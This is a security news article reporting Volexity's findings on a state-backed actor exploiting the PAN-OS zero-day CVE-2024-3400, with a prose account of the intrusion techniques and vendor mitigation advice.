A threat actor has successfully exploited a zero-day in Palo Alto Networks firewalls for more than two weeks, malware hunters at Volexity warn.
Palo Alto Networks disclosed the vulnerability on Friday, warning that it was aware of limited in-the-wild exploitation and promising patches within the next two days.
Tracked as CVE-2024-3400 (CVSS score of 10/10), the security defect is described as a command injection issue allowing unauthenticated attackers to execute arbitrary code on impacted firewalls, with root privileges.
According to the vendor, all appliances running PAN-OS versions 10.2, 11.0, and 11.1 that have GlobalProtect gateway and device telemetry enabled are vulnerable. Other PAN-OS versions, cloud firewalls, Panorama appliances, and Prisma Access are not affected.
“Palo Alto Networks is aware of malicious exploitation of this issue. We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse, as we assess with high confidence that known exploitation we’ve analyzed thus far is limited to a single threat actor,” the company says in a blog post.
Volexity has attributed the CVE-2024-3400 exploitation to a state-sponsored threat actor it tracks as ‘UTA0218’, which appears to be highly capable “with a clear playbook of what to access to further their objectives”.
“Volexity assesses that it is highly likely UTA0218 is a state-backed threat actor based on the resources required to develop and exploit a vulnerability of this nature, the type of victims targeted by this actor, and the capabilities displayed to install the Python backdoor and further access victim networks,” the cybersecurity firm notes.
The company is currently unable to link the activity to previously known threat actors or operations.
It is unclear how widespread the exploitation might have been, but Volexity says it has “evidence of potential reconnaissance activity involving more widespread exploitation aimed at identifying vulnerable systems”.
Since March 26, the cybersecurity firm says, UTA0218 has been successfully exploiting the zero-day against multiple organizations. In two instances, the attackers also injected a Python-based backdoor called Upstyle and used it to execute additional commands.
“After successfully exploiting devices, UTA0218 downloaded additional tooling from remote servers they controlled in order to facilitate access to victims’ internal networks. They quickly moved laterally through victims’ networks, extracting sensitive credentials and other files that would enable access during and potentially after the intrusion,” Volexity explains.
The threat actor was seen creating a cron job on the firewall to persistently fetch a file from a remote server and execute its contents. The attackers were seen manually managing an access control list for the command-and-control (C&C) server, to ensure that it can only be accessed from the device communicating with it.
UTA0218 was also observed deploying a reverse shell written in Python and an open source SSH reverse shell, downloading reverse proxy tooling such as GOST (GO Simple Tunnel), and exfiltrating configuration data from the compromised firewalls.
In one attack, the threat actor used a highly privileged service account from the Palo Alto Networks firewall to move laterally via SMB and WinRM. UTA0218 then stole the Active Directory database, key data, Windows event logs, login information, cookies, and browser data, and was able to decrypt stored credentials.
“UTA0218 was not observed deploying malware or additional methods of persistence on systems within victim networks. The stolen data did allow the attacker to effectively compromise credentials for all domain accounts. Further, the attacker gained access and could potentially use valid credentials or cookies taken from browser data for specific user workstations accessed,” Volexity explains.
Patches for CVE-2024-3400 are expected to arrive by April 14. In the meantime, organizations are advised to disable device telemetry on their firewalls, and apply other mitigation recommendations that Palo Alto Networks detailed in its advisory.
Organizations that believe they were compromised via this zero-day are advised to collect logs, create a tech support file, and preserve forensic artifacts. They should also hunt for potential lateral movement and should consider all sensitive data on the firewall to be compromised.
Both Palo Alto Networks and Volexity warn that exploitation of CVE-2024-3400 is likely to spike over the next few days, both by UTA0218 and other threat actors, mainly driven by the imminent availability of patches.
Related: Palo Alto Networks Warns of Exploited Firewall Vulnerability
Related: Pixel Phone Zero-Days Exploited by Forensic Firms
Related: CISA: Second SharePoint Flaw Disclosed at Pwn2Own Exploited in Attacks
Related: Recent Fortinet FortiClient EMS Vulnerability Exploited in Attacks
